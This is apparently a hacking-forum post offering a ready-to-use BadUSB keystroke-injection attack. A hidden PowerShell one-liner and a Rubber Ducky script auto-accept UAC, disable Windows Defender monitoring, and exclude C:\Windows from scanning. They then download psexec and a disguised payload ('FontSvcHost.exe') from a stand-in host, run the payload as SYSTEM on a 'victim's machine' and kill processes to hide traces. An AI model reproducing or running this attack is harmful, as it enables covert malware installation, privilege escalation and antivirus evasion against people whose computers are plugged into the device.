So you've got a badusb or cheaper equivalent (malduino / digispark) that performs HID attacks. Well, lets see what we can do with that. I've created a malicious powershell command that downloads your malware / shellcode and executes it on the victims machine and attempts to elevate your malicious process to run under the SYSTEM context. Below is the script and a more detailed explanation as what takes place. Enjoy.
[+] Explanation:
The first part of the command -WindowStyle Hidden '-c' sets the PowerShell window to be hidden and starts the command.
The script then brings up the Run prompt and executes : "powershell -WindowStyle Hidden Start-Process powershell -Verb runAs " This prompts UAC for permission to launch under adminstrator rights, and the appropriate keystrokes are used to click "Yes" and launches powershell.
The Start-Sleep cmdlet is used to pause the script for 10 seconds to allow time for the file to be downloaded.
The Invoke-WebRequest cmdlet is used to download psexec.exe ( a legitimate application from Microsoft's Sysinternals Suite) from the specified URL and saves it to the C:\Windows\System32\psexec.exe
The Start-Sleep cmdlet is used to pause the script for 10 seconds to allow time for the file to be downloaded.
The Start-Process cmdlet is used to download psexec.exe and passes several arguments:
/accepteula -i -s -h CMD /k powershell -WindowStyle Hidden -command "Invoke-WebRequest -Uri 'http://payload.com/payload.exe' -OutFile 'C:\Windows\System32\payload.exe'; Start-Sleep -Seconds 6; & 'C:\Windows\System32\payload.exe'"
This executes psexec.exe in an elevated context which opens a new command prompt running under the SYSTEM context and then passes the remaining arguments, which in turn launches your payload under SYSTEM.
The Get-Process and Foreach-Object cmdlet is used to loop through each process, and the Kill() method is used to terminate each of these processes: powershell.exe, conhost, cmd, and psexec.exe and kills them, since they're no longer needed (cleanup operation).
[+] Additionally: We can add an exception for our payload to windows defender's exception list and exclude the entire System32 path. (C:\Windows\). I have done so in the BADUSB script. Enjoy.
Powershell Command:
powershell -WindowStyle Hidden -c "Invoke-WebRequest -Uri 'http://payload.com/psexec.exe' -OutFile 'C:\Windows\psexec.exe'; Start-Sleep -Seconds 10; Start-Process -FilePath 'C:\Windows\psexec.exe' -ArgumentList '/accepteula -i -s -h CMD /k powershell -WindowStyle Hidden -command `"Invoke-WebRequest -Uri `"http://payload.com/FontSvcHost.exe`" -OutFile `"C:\Windows\FontSvcHost.exe`"; Start-Sleep -Seconds 6; & `"C:\Windows\FontSvcHost.exe`"`' -WindowStyle Hidden;"; Get-Process powershell.exe, conhost, cmd, psexec.exe | Foreach-Object { $_.Kill() };
[+] BADUSB SCRIPT:
DELAY 1200
GUI r
DELAY 1000
STRING powershell -WindowStyle Hidden Start-Process powershell -Verb runAs
DELAY 1200
ENTER
DELAY 1200
LEFTARROW
DELAY 1000
ENTER
DELAY 1300
STRING powershell -WindowStyle Hidden -c "Set-MpPreference -DisableRealtimeMonitoring $true -DisableBlockAtFirstSeen $true -DisableNotifications $true -ExclusionPath `"C:\Windows\`" Invoke-WebRequest -Uri 'http://payload.com/psexec.exe' -OutFile 'C:\Windows\psexec.exe'; Start-Sleep -Seconds 10; Start-Process -FilePath 'C:\Windows\psexec.exe' -ArgumentList '/accepteula -i -s -h CMD /k powershell -WindowStyle Hidden -command `"Invoke-WebRequest -Uri `"http://payload.com/FontSvcHost.exe`" -OutFile `"C:\Windows\FontSvcHost.exe`"; Start-Sleep -Seconds 10; & `"C:\Windows\FontSvcHost.exe`"`' -WindowStyle Hidden;"; Get-Process powershell.exe, conhost, cmd, psexec.exe | Foreach-Object { $_.Kill() };
DELAY 1000
ENTER
[+] Feel free to offer suggestions and improvements that can be added.
EDIT: [+] You can use https://duckify.huhn.me/ to translate any Hak5 Rubber Ducky scripts into a compatible sketch for your Digispark Attiny85.